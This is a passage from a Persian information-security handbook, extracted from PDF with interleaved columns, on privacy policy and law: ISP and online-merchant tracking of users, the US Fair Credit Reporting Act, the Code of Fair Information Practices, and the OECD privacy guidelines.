‫ﺧﻮﺩ ﺭﺍ ﻗﻮﻳﺘﺮ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﺎﻧﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﭘﻴﭽﻴﺪﻩﺗـﺮ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬
‫ﻣﺪﺍﻓﻌﻴﻦ ﻭ ﻛﺴﺎﻧﻴﻜﻪ ﻣﺴﺘﻌﺪ ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﺮﻗـﻲ‬
‫ﻭ ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪١٧٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ‪ISP‬ﻫﺎ ﺑﮕﺬﺭﺩ‪ISP .‬ﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬


‫ﺏ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﻭ ﺣﺘﻲ ﻣﻘﺎﻻﺗﻲ ﻛﻪ‬ ‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭ ﹺ‬
‫ﻣــﻮﺭﺩ ﻣﻄﺎﻟﻌــﻪ ﻗــﺮﺍﺭ ﺩﺍﺩﻩﺍﻧــﺪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﻫﻨــﺪ‪ .‬ﺁﻧﻬــﺎ ﺣﺘــﻲ‬
‫ﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺑـﺮ ﺣـﺴﺐ ﻛﻠﻤـﺎﺕ‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬
‫ﻛﻠﻴﺪﻱ ﺑﻜﺎﺭﺭﻓﺘﻪ ﺩﺭ ﻣﺘﻦ ﺁﻧﻬـﺎ ﺗﺤﻠﻴـﻞ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺑـﺎ ﺭﺩﮔﻴـﺮﻱ ﻭ‬ ‫ﻓﺼﻞ ﻫﺸﺘﻢ‬
‫ﺗﺤﻠﻴﻞ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻳﻚ ‪ ISP‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﮕﻮﻳﺪ ﻛﻪ ﻣـﺜ ﹰ‬
‫ﻼ ﺁﻳـﺎ‬
‫ﻛﺎﺭﺑﺮﺍﻧﺶ ﺑﻪ ﺳﻔﺮ ﺑﺎ ﻗـﺎﻳﻖ ﻋﻼﻗﻤﻨـﺪ ﻫـﺴﺘﻨﺪ ﻳـﺎ ﺑـﻪ ﺳـﻔﺮ ﺑـﺎ‬
‫ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ‪،‬‬
‫ﺍﺗﻮﻣﺒﻴﻞ؛ ﺑﻪ ﻣﺪ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨﺪ ﻳﺎ ﺧﻴﺮ؛ ﻭ ﺁﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺩﺭﻣـﺎﻥ‬ ‫ﺗﺪﻭﻳﻦ ﺁﻳﻴﻦﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ‪،‬‬
‫ﺑﻴﻤﺎﺭﻱ ﺧﺎﺻﻲ ﻋﻼﻗﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﺑﻪ ﺗﺠـﺎﺭﺕ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﺩﺭ‬
‫ﺭﺍﺑﻄﻪ ﺑﺎ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﻜـﺎﻥ ﺗـﺸﺨﻴﺺ ﻫﻮﻳـﺖ ﻭ‬ ‫ﺩﺭ ﺍﻳــﻦ ﻓــﺼﻞ ﻣــﺮﻭﺭﻱ ﺧــﻮﺍﻫﻴﻢ ﺩﺍﺷــﺖ ﺑــﺮ ﻧﺤــﻮﺓ ﺗــﺪﻭﻳﻦ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣـﻲﺁﻭﺭﺩ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ‬ ‫ﻲ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ ﻣﺆﺳـﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﻭ‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻋﻤـﻮﻣ ﹺ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺗﺒﻌﻴﺖ ﻛﻨﻨﺪ؟‬ ‫ﺩﻭﻟﺘﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺘﺼﻞ ﺑﻪ ﺷـﺒﻜﻪ‪ .‬ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺧـﻮﺍﻫﻴﻢ ﺩﻳـﺪ ﺍﺯ‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺣﻘﻮﻕ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺩﺭ ﻗـﺎﻧﻮﻥ‬ ‫ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺷﻬﺮﻭﻧﺪﺍﻥ‪ ،‬ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻛﻮﺩﻛـﺎﻥ ﺍﺯ‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﻣﻄﺎﻟﺐ ﻏﻴﺮﺍﺧﻼﻗـﻲ‪ .‬ﺩﺭ ﺑﺨـﺶ‬
‫ﮔﺰﺍﺭﺵ ﺍﻋﺘﺒﺎﺭ ﺑﺎﺯﺍﺭ‪) ١١٦‬ﻣﺼﻮﺏ ﺳﺎﻝ ‪ (۱۹۷۰‬ﺻﺮﺍﺣﺘﹰﺎ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ‬ ‫‪١١٥‬‬
‫ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺣﻘﻮﻕ ﺍﺳﺎﺳﻲ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﺭﺍ ﺑـﻪ‬ ‫ﭼﻬﺎﺭﻡ ﺑﺤﺚ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﻣﻄﺮﺡ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺗﺄﻛﻴﺪ ﻣﺎ ﺑﻴﺸﺘﺮ ﺭﻭﻱ ﻣﺴﺌﻮﻟﻴﺖ‬
‫ﺭﺳﻤﻴﺖ ﻣﻲﺷﻨﺎﺧﺖ؛ ﺣﻘﻮﻗﻲ ﭼﻮﻥ ﺣـﻖ ﻣﻼﺣﻈـﺔ ﮔﺰﺍﺭﺷـﻬﺎﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺩﺭ ﻓﻀﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺳﺖ‪.‬‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻫﺮ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺗﻮﺳﻂ ﺧﻮﺩ ﺍﻭ‪ ،‬ﺣﻖ ﺍﻃـﻼﻉ ﺍﺯ ﺍﻳﻨﻜـﻪ‬
‫ﭼﻪ ﻛﺴﺎﻧﻲ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻭﻱ ﺭﺍ ﻣـﻲﺑﻴﻨﻨـﺪ‪ ،‬ﺣـﻖ ﺍﻟـﺰﺍﻡ‬
‫ﺭﻭﺍﺑﻂ ﺗﺠﺎﺭﺕ ﻭ ﻣﺸﺘﺮﻱ ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﻬﻴﻪﻛﻨﻨﺪﺓ ﮔﺰﺍﺭﺷﺎﺕ ﺑﻪ ﺗﺤﻘﻴﻖ ﺩﺭ ﻣﻮﺭﺩ ﺍﺷـﺘﺒﺎﻫﺎﺕ‬
‫ﻛﺸﻒﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﺣﻖ ﺍﻟـﺰﺍﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ‬ ‫ﺑﺎﺯﺭﮔﺎﻧﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑﺪﺳـﺖ‬
‫ﺍﺿﺎﻓﻪﻛﺮﺩﻥ ﻳﻚ ﺍﻇﻬﺎﺭﻳﻪ ﺍﺯ ﻃـﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﮔﺰﺍﺭﺷـﻬﺎﻱ‬ ‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺵ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣـﻲﺩﺍﻧـﺪ ﺷـﻤﺎ ﺩﺭﺣـﺎﻝ‬
‫ﻣــﻮﺭﺩ ﻣﻨﺎﻗــﺸﻪ‪ .‬ﺩﺭ ﺳــﺎﻝ ‪ - ۱۹۷۳‬ﺩﺭ ﺩﻭﺭﻩﺍﻱ ﻛــﻪ ﺩﺍﺩﻩﻫــﺎﻱ‬ ‫ﺑﺮﺭﺳﻲ ﻛﺪﺍﻡ ﻣﺤﺼﻮﻝ ﻫـﺴﺘﻴﺪ؛ ﻛـﺪﺍﻡ ﻣﺤـﺼﻮﻝ ﺭﺍ ﺑـﻪ ﻛـﺎﺭﺕ‬
‫ﺷﺨﺼﻲ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ ‪ -‬ﺑـﺮﺍﻱ‬ ‫ﺧﺮﻳﺪ ﺧﻮﺩ ﻣﻲﺍﻓﺰﺍﻳﻴﺪ ﺍﻣﺎ ﭘﺲ ﺍﺯ ﻣﺪﺗﻲ ﺣﺬﻑ ﻣﻲﻛﻨﻴﺪ؛ ﻭ ﻛـﺪﺍﻡ‬
‫ﺍﺣﻘﺎﻕ ﺣﻘﻮﻕ ﻣﺼﺮﻑ ﻛﻨﻨﺪﻩ‪ ،‬ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻣﺤــﺼﻮﻝ ﺭﺍ ﻧﻬﺎﻳﺘـﹰﺎ ﺑــﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻣــﻲﺧﺮﻳــﺪ‪ .‬ﺑﺎﺯﺭﮔﺎﻧــﺎﻥ‬
‫ﺑﺎﺯﺍﺭ‪ ١١٧‬ﺍﺑﻼﻍ ﺷﺪ‪.‬‬ ‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺩﺍﻧﻨﺪ ﻫﻨﮕﺎﻡ ﺧﺮﻳﺪ ﺩﺭ ﺧﺎﻧﻪ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ‬
‫ﺳ ﹺﺮ ﻛﺎﺭ‪ ،‬ﻭ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺑﺎﻗﻴﻤﺎﻧـﺪﺓ ﺍﻋﺘﺒـﺎﺭ ﻛـﺎﺭﺕ‬
‫‪١١٨‬‬
‫ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ‬ ‫ﺧﺮﻳﺪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻄﻠـﻊ ﺷـﻮﻧﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﺮﺧﻼﻑ ﺩﻧﻴـﺎﻱ‬
‫ﻏﻴﺮﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﻳﻚ ﺑﺎﺯﺭﮔﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻴﺎﻥ ﺳﺎﺑﻘﺔ ﺧﺮﻳـﺪ‬
‫ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ ﺑﺮ ﭘﻨﺞ ﺍﺻﻞ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ‪:‬‬
‫ﻭ ﻋﺎﺩﺗﻬﺎﻱ ﮔﺮﺩﺵ ﺷﻤﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭ ﺑـﺎ‬
‫ﻖ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳـﺪ‬
‫ﻱ ﺳﻮﺍﺑ ﹺ‬
‫ﻫﻴﭻ ﺳﻴﺴﺘ ﹺﻢ ﻧﮕﻬﺪﺍﺭ ﹺ‬ ‫•‬ ‫ﺑﺮﻗﺮﺍﺭﻱ ﭼﻨﻴﻦ ﺭﻭﺍﺑﻄﻲ ﻣﻴﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻃﻴﻒ ﻭﺳﻴﻌﻲ ﺍﺯ‬
‫ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬ ‫ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﺑﻪ ﻳﻜﺴﺮﻱ ﺍﻟﮕﻮﻫﺎﻱ ﺍﺭﺯﺷﻤﻨﺪ ﺭﻓﺘﺎﺭﻱ ﭘﻲ ﺑﺒﺮﺩ‪.‬‬
‫‪ISP‬ﻫــﺎ ﻗﺎﺩﺭﻧــﺪ ﺍﺯ ﺍﻳــﻦ ﻫــﻢ ﺑﻴــﺸﺘﺮ ﺩﺭ ﻣــﻮﺭﺩ ﻣــﺸﺘﺮﻱ ﺧــﻮﺩ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﺴﺐ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺮﺁﻧﭽﻪ ﻛﺎﺭﺑ ﹺﺮ ﺍﻳﻨﺘﺮﻧﺖ ﻣـﻲﺑﻴﻨـﺪ‬
‫‪116 Fair Credit Reporting Act‬‬
‫‪117 Code of Fair Information Practices‬‬
‫‪ ۱۱۸‬ﻣﻨﺒﻊ‪ :‬ﻭﺯﺍﺭﺕ ﺑﻬﺪﺍﺷﺖ‪ ،‬ﺁﻣﻮﺯﺵ ﻭ ﺭﻓﺎﻩ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬ ‫‪115 Cyberspace‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٧٦‬‬

‫ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ‬ ‫ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺍﻃـﻼﻉ‬ ‫•‬
‫ﭘﻴﺪﺍ ﻛﻨﺪ ﻛﻪ ﭼﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﻣﻲﺷﻮﺩ‬
‫ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ‬
‫ﻭ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﻪ ﺍﻗﺘـﺼﺎﺩﻱ )‪ ١٢١(OECD‬ﺩﺭ ﺳـﺎﻝ‬
‫‪ ۱۹۸۰‬ﻳﻚ ﺭﺷﺘﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺖ ﻭ‬ ‫ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ‬ ‫•‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪ .‬ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ‬ ‫ﺑﻜﺎﺭ ﺭﻓﺘﻦ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺩﺭ ﺍﻫـﺪﺍﻓﻲ ﻏﻴـﺮ ﺍﺯ‬
‫ﺿﻮﺍﺑﻂ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ‬ ‫ﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﻼﻡ ﺷﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ‪.‬‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﻄﻮﺭ ﺧـﺎﺹ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ‬ ‫ﺑﺮﺍﻱ ﺧﻮﺩ ﻓﺮﺩ ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﺻـﻼﺡ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ ﺍﻭ‬ ‫•‬
‫ﺑﻮﺩﻧﺪ ﺗﺎ ﺑﻪ ﻣـﺸﻜﻼﺕ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﺟﺮﻳـﺎﻥ ﻓﺮﺍﻣـﺮﺯﻱ ﺩﺍﺩﻩﻫـﺎ ‪-‬‬ ‫ﻛﻪ ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﻭﻱ ﻣﻲﺷﻮﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺣﺮﻛﺖ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺩﺭ‬
‫ﻫﺮ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺭﺍ‬ ‫•‬
‫ﺁﻥ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺑﻪ ﻛـﺸﻮﺭﻱ ﺩﻳﮕـﺮ ﻛـﻪ‬
‫ﺗﻬﻴﻪ‪ ،‬ﻧﮕﻬﺪﺍﺭﻱ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﭘﺨﺶ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺩﺭ ﺁﻥ ﺍﺯ ﺣﻔﺎﻇـﺖ ﻛﻤﺘـﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ ‪-‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺩﻩ ﻫﺎ ﺩﺭ‬
‫ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ .‬ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ ‪ OECD‬ﺩﺭ ﻣــﻮﺭﺩ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺮﻳﻢ‬
‫ﻛﺎﺭﺑﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺗـﻀﻤﻴﻦ ﻧﻤﺎﻳـﺪ ﻭ ﺍﺯ ﻣـﻮﺭﺩ ﺳـﻮﺀ‬
‫ﺧﺼﻮﺻﻲ ﻭ ﺟﺮﻳﺎﻥ ﻓﺮﺍﻣﺮﺯﻱ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻫـﺸﺖ ﺍﺻـﻞ ﺗـﺸﻜﻴﻞ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪.‬‬
‫ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻪ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ‬
‫‪١٢٢‬‬
‫ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺟﻤﻊﺁﻭﺭﻱ‬ ‫ﺷﺨﺼﻲ ﺭﺍ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻣﻲﻛـﺮﺩ ﺍﺩﺍﻣـﻪ ﺩﺍﺩ‪ .‬ﺑـﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ‪،‬‬
‫ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻣﺤﺪﻭﺩﻳﺖ ﻭﺟﻮﺩ‬ ‫ﻦ‬
‫ﺳﻮﺍﺑﻖ ﺑﺎﻧﻜﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﺗﻠﻔﻦ‪ ،‬ﺳﻮﺍﺑﻖ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺳﻮﺍﺑﻖ ﻣـﺸﺘﺮﻛﻴ ﹺ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻫﺮ ﺩﺍﺩﺓ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ‬ ‫ﺗﻠﻮﻳﺰﻳﻮﻥ ﻛﺎﺑﻠﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﺑﻬﺪﺍﺷـﺘﻲ‪ ،‬ﺳـﻮﺍﺑﻖ ﺗﺤـﺼﻴﻠﻲ ﻭ ﺣﺘـﻲ‬
‫ﻗــﺎﻧﻮﻧﻲ ﻭ ﻣﻨــﺼﻔﺎﻧﻪ‪ ،‬ﺩﺭ ﺷــﺮﺍﻳﻂ ﺩﺭﺳــﺖ‪ ،‬ﻭ ﺑــﺎ ﺩﺍﻧــﺶ ﻭ‬ ‫ﺳﻮﺍﺑﻖ ﺍﺟﺎﺭﺓ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳـﺪﺋﻮﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺗﺤـﺖ ﭘﻮﺷـﺶ‬
‫ﺭﺿﺎﻳﺖ ﻓﺮﺩﻱ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺍﻭ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﺩ ﺑﺪﺳﺖ‬ ‫ﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭﺁﻣﺪﻧﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﻫـﺮ ﺟـﺰﺀ‬‫ﻗﺎﻧﻮﻥ ﻛﻨﮕﺮﻩﺍ ﹺ‬
‫ﺑﻴﺎﻳﺪ‪.‬‬ ‫ﻗﺎﻧﻮﻥ ﺣﻔﺎﻇﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺍﻳﺠـﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺗﻮﺳـﻂ ﺑﺨـﺶ‬
‫‪١٢٣‬‬
‫ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻧﻴﺮﻭﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺟﺮﺍﺋﻢ ﻣﺜـﻞ‬
‫ﺍﺻﻞ ﻛﻴﻔﻴﺖ ﺩﺍﺩﻩﻫﺎ‬ ‫ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣﺔ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣـﺸﺘﺮﻛﻴﻦ ﺗﻠﻔـﻦ ﻭ‬
‫ﻲ ﺟﻤﻊﺁﻭﺭﻱﺷﺪﻩ ﺑﺎﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﻫـﺪﻓﻲ‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼ ﹺ‬
‫ﺩﻭﺭﻧﮕﺎﺭ‪ ١١٩‬ﻣﻲﮔﻨﺠﺪ‪ ،‬ﺑﺪﻭﻥ ﺷـﻜﺎﻳﺖ ﺷـﺎﻛﻲ ﺧـﺼﻮﺻﻲ ﻗﺎﺑـﻞ‬
‫ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﻋﻼﻡ ﺷﺪﻩ ﻭ ﻳﺎ ﺣﻮﺯﻩ‪-‬‬
